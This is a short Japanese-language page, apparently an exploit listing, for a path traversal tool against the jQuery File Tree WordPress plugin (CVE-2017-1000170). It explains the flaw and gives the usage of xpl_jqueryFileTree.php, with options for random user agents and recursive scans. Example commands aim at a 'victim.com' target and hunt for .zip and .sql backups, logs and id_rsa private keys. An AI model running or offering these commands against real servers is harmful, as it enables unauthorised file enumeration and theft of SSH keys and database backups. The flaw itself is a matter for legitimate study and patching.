
Jquery File Tree 1.6.6 パストラバーサル エクスプロイト (CVE-2017-1000170)
Jquery File Tree 1.6.6 パストラバーサル エクスプロイト (CVE-2017-1000170)
Wordpress のデフォルト設定における jQueryFileTree <1.6.6 プラグインは、ユーザーデータの解析に失敗し、パストラバーサルの脆弱性を引き起こします。
これにより、攻撃者はウェブサーバーの読み取り可能なすべてのフォルダーのファイル名を列挙できます。
ローカルファイルインクルージョンまたはローカルファイル開示攻撃に組み合わせることで、サーバー上の任意の読み取り可能なファイルを任意にダウンロードできる可能性があります。
$ xpl_jqueryFileTree.php -u url [-f extensions/filenames] [-p path] [-r] [-h] [-a]
凡例:
-h, --help: このメッセージを表示
-u, --url: ターゲットの URL
-a, --random-agent: ランダムなユーザーエージェントを使用
-f, --filter: 検索するファイルまたは拡張子の名前 (カンマ区切り)
-p, --path: ファイル名が読み取られるフルパス (デフォルト: /)
-r, --recursive: ツリーを再帰的に生成 (注意が必要)
例: xpl_jqueryFileTree.php -u victim.com -f .zip,.sql -p /var/www/html/backup/admin/ -r
|
\-> victim.com/backup/admin およびそのサブパス内のすべての .zip ファイルと .sql ファイルを検索します
(拡張子であることを示すドットを必ず指定してください)
xpl_jqueryFileTree.php -u victim.com -f .log,id_rsa -a -r
|
\-> ランダムなユーザーエージェントを使用して、サーバー内のすべてのフォルダーから "id_rsa" という名前のファイルまたは
".log" 拡張子を持つファイルをすべて検索します
ヒント: 結果をファイルに保存するには "php ..... | tee output" を使用してください
